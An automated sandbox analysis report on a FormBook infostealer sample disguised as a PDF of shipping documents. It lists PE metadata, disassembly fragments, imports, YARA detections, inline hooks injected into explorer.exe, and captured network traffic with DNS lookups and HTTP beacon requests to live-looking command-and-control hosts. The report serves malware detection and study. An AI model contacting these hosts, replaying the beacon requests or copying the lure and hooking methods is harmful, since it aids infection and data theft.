                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [edx+196CB283h], al
                                      dec edx
                                      pop ecx
                                      dec esp
                                      sbb byte ptr [esp], 0000003Dh
                                      jle 00007F0E149E12C9h
                                      pop es
                                      mov edx, 00000000h
                                      add byte ptr [eax], al
                                      add dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      and byte ptr [edx+69h], al
                                      arpl word ptr [ebp+70h], sp
                                      inc ebx
                                      dec eax
                                      dec ecx
                                      inc ecx
                                      dec esi
                                      push esp
                                      dec ecx
                                      inc ebp
                                      push edx
                                      add byte ptr [edx], bh
                                      or eax, 6E694C0Ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      dec esp
                                      xor dword ptr [eax], eax
                                      add esi, ebx
                                      out dx, eax
                                      pop edx
                                      mov bl, byte ptr [esi]
                                      test eax, 64B943D8h
                                      mov ebx, 2D0A1850h
                                      pop esi
                                      jnp 00007F0E149E1331h
                                      adc byte ptr [esi+57h], ah
                                      jmp far 8A08h : B18041B3h
                                      nop
                                      retf 5F47h
                                      cmp cl, byte ptr [edi-53h]
                                      xor ebx, dword ptr [ecx-48EE309Ah]
                                      or al, 00h
                                      stosb
                                      add byte ptr [eax-2Dh], ah
                                      xchg eax, ebx
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      sub ah, byte ptr [24FA0000h]
                                      add byte ptr [eax], al
                                      add byte ptr [ebx], cl
                                      add byte ptr [edx+69h], al
                                      arpl word ptr [ebp+70h], sp
                                      push 756F6C61h
                                      jnc 00007F0E149E12C2h
                                      or eax, 53000701h
                                      push esp
                                      inc ebp

                                      Data Directories

                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x115b4 | 0x28 | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x15d8 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xe4 | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                      Sections

                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0x109c4 | 0x11000 | False | 0.362979664522 | data | 5.28834506812 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .data | 0x12000 | 0x118c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0x14000 | 0x15d8 | 0x2000 | False | 0.138793945312 | data | 1.78701824308 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name | RVA | Size | Type | Language | Country
                                      RT_ICON | 0x153f0 | 0x1e8 | data | |
                                      RT_ICON | 0x14d28 | 0x6c8 | data | |
                                      RT_ICON | 0x143a0 | 0x988 | data | |
                                      RT_GROUP_ICON | 0x14370 | 0x30 | data | |
                                      RT_VERSION | 0x14150 | 0x220 | data | Greek | Greece

                                      Imports

                                      DLL | Import
                                      MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaCastObjVar, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarDup, __vbaVarLateMemCallLd, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                      Version Infos

                                      Description | Data
                                      Translation | 0x0408 0x04b0
                                      InternalName | fdselskontrol
                                      FileVersion | 2.00
                                      CompanyName | Gallup
                                      ProductName | Gallup
                                      ProductVersion | 2.00
                                      OriginalFilename | fdselskontrol.exe

                                      Possible Origin

                                      Language of compilation system | Country where language is spoken
                                      Greek | Greece

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Nov 20, 2020 08:53:59.745408058 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:53:59.879342079 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:53:59.879503965 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:53:59.893282890 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.027230978 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.029325962 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.029354095 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.029365063 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.029715061 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.108243942 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.242584944 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.242741108 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.255810976 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.394313097 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394345045 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394361973 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394398928 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394418955 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394442081 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394464016 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394464016 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.394484043 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394500017 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.394506931 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394529104 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.394529104 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.394556999 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.394588947 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528464079 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528506041 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528525114 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528553009 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528574944 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528593063 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528613091 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528633118 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528637886 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528651953 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528672934 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528692007 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528693914 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528717041 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528738976 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528739929 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528759956 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528768063 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528780937 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528788090 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528801918 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528820992 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528825045 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528844118 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528865099 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528865099 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528889894 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.528889894 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528927088 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.528949022 CET | 49699 | 443 | 192.168.2.3 | 192.185.170.106
                                      Nov 20, 2020 08:54:00.662935019 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.662976027 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.662992954 CET | 443 | 49699 | 192.185.170.106 | 192.168.2.3
                                      Nov 20, 2020 08:54:00.663016081 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663038015 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663060904 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663081884 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663103104 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663124084 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663146973 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663166046 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663181067 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663187027 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663208008 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663232088 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663235903 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663243055 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663255930 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663275957 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663276911 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663295031 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663297892 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663320065 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663340092 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663352966 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663361073 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663367987 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663373947 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663382053 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663398027 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663407087 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663429022 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663443089 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663449049 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663470984 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663481951 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663494110 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663513899 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663522959 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663535118 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.663536072 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.663557053 CET44349699192.185.170.106192.168.2.3

                                      UDP Packets

                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                       Nov 20, 2020 08:53:41.036067009 CET | 49873 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:41.071582079 CET | 53 | 49873 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:42.716921091 CET | 53196 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:42.744040966 CET | 53 | 53196 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:44.888142109 CET | 56777 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:44.923767090 CET | 53 | 56777 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:46.453296900 CET | 58643 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:46.480426073 CET | 53 | 58643 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:47.579297066 CET | 60985 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:47.609194994 CET | 53 | 60985 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:48.411073923 CET | 50200 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:48.438081026 CET | 53 | 50200 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:49.291783094 CET | 51281 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:49.318876028 CET | 53 | 51281 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:51.135487080 CET | 49199 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:51.162585020 CET | 53 | 49199 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:58.944839001 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:58.971955061 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:59.697483063 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:59.732965946 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:53:59.744282007 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:53:59.771338940 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:54:01.299463034 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:54:01.336406946 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:54:32.659728050 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:54:32.686847925 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:54:38.349349976 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:54:38.376209974 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:54:39.226186991 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:54:39.253403902 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:54:40.286223888 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:54:40.313278913 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:55:04.128407001 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:55:04.268604040 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:55:24.721892118 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:55:25.058480024 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
                                       Nov 20, 2020 08:55:45.905834913 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
                                       Nov 20, 2020 08:55:46.033629894 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3

                                      DNS Queries

                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                       Nov 20, 2020 08:53:59.697483063 CET | 192.168.2.3 | 8.8.8.8 | 0xb712 | Standard query (0) | lifeandhealth.com.mx | A (IP address) | IN (0x0001)
                                       Nov 20, 2020 08:55:04.128407001 CET | 192.168.2.3 | 8.8.8.8 | 0x7ec8 | Standard query (0) | www.drinksandfruits.com | A (IP address) | IN (0x0001)
                                       Nov 20, 2020 08:55:24.721892118 CET | 192.168.2.3 | 8.8.8.8 | 0x62eb | Standard query (0) | www.iatlet.com | A (IP address) | IN (0x0001)
                                       Nov 20, 2020 08:55:45.905834913 CET | 192.168.2.3 | 8.8.8.8 | 0x733d | Standard query (0) | www.leepl.com | A (IP address) | IN (0x0001)

                                      DNS Answers

                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                       Nov 20, 2020 08:53:59.732965946 CET | 8.8.8.8 | 192.168.2.3 | 0xb712 | No error (0) | lifeandhealth.com.mx | | 192.185.170.106 | A (IP address) | IN (0x0001)
                                       Nov 20, 2020 08:55:04.268604040 CET | 8.8.8.8 | 192.168.2.3 | 0x7ec8 | No error (0) | www.drinksandfruits.com | drinksandfruits.com | | CNAME (Canonical name) | IN (0x0001)
                                       Nov 20, 2020 08:55:04.268604040 CET | 8.8.8.8 | 192.168.2.3 | 0x7ec8 | No error (0) | drinksandfruits.com | | 68.70.163.36 | A (IP address) | IN (0x0001)
                                       Nov 20, 2020 08:55:25.058480024 CET | 8.8.8.8 | 192.168.2.3 | 0x62eb | No error (0) | www.iatlet.com | | 156.224.66.93 | A (IP address) | IN (0x0001)
                                       Nov 20, 2020 08:55:46.033629894 CET | 8.8.8.8 | 192.168.2.3 | 0x733d | No error (0) | www.leepl.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                                       Nov 20, 2020 08:55:46.033629894 CET | 8.8.8.8 | 192.168.2.3 | 0x733d | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | 3.223.115.185 | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.drinksandfruits.com
                                      • www.iatlet.com

                                      HTTP Packets

                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                       0 | 192.168.2.3 | 49706 | 68.70.163.36 | 80 | C:\Windows\explorer.exe
                                       Timestamp | kBytes transferred | Direction | Data
                                       Nov 20, 2020 08:55:04.387131929 CET | 378 | OUT | GET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1
                                      Host: www.drinksandfruits.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                       Nov 20, 2020 08:55:04.521594048 CET | 378 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 20 Nov 2020 07:55:04 GMT
                                      Server: Apache
                                      Content-Length: 315
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                       1 | 192.168.2.3 | 49707 | 156.224.66.93 | 80 | C:\Windows\explorer.exe
                                       Timestamp | kBytes transferred | Direction | Data
                                       Nov 20, 2020 08:55:25.262208939 CET | 379 | OUT | GET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1
                                      Host: www.iatlet.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                       Nov 20, 2020 08:55:31.869110107 CET | 380 | IN | HTTP/1.1 200 OK
                                      Date: Fri, 20 Nov 2020 07:55:25 GMT
                                      Server: Apache
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Pragma: no-cache
                                      Connection: close
                                      Set-Cookie: PHPSESSID=i583v17ri483prc4m1vi8lcsh2; path=/
                                      Upgrade: h2
                                      Connection: Upgrade
                                      Content-Length: 0
                                      Content-Type: text/html; charset=gbk


                                      HTTPS Packets

                                       Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                       Nov 20, 2020 08:54:00.029365063 CET | 192.185.170.106 | 443 | 192.168.2.3 | 49699 | CN=webdisk.lifeandhealth.com.mx | CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | Fri Nov 06 17:15:38 CET 2020 | Thu Feb 04 17:15:38 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
                                       (chain, same session) | | | | | CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Thu Mar 17 17:40:46 CET 2016 | Wed Mar 17 17:40:46 CET 2021 | |

                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                       Function Name | Hook Type | Active in Processes
                                       PeekMessageA | INLINE | explorer.exe
                                       PeekMessageW | INLINE | explorer.exe
                                       GetMessageW | INLINE | explorer.exe
                                       GetMessageA | INLINE | explorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                       Function Name | Hook Type | New Data
                                       PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xED
                                       PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xED
                                       GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xED
                                       GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xED

                                      Statistics

                                      Behavior


                                      System Behavior

                                      General

                                      Start time:08:53:37
                                      Start date:20/11/2020
                                      Path:C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0x7ffb73670000
                                      File size:86016 bytes
                                      MD5 hash:AED402D9A5675F5796265E5170ADA7CB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Visual Basic
                                      Reputation:low

                                      General

                                      Start time:08:53:48
                                      Start date:20/11/2020
                                      Path:C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0x7ffb73670000
                                      File size:86016 bytes
                                      MD5 hash:AED402D9A5675F5796265E5170ADA7CB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
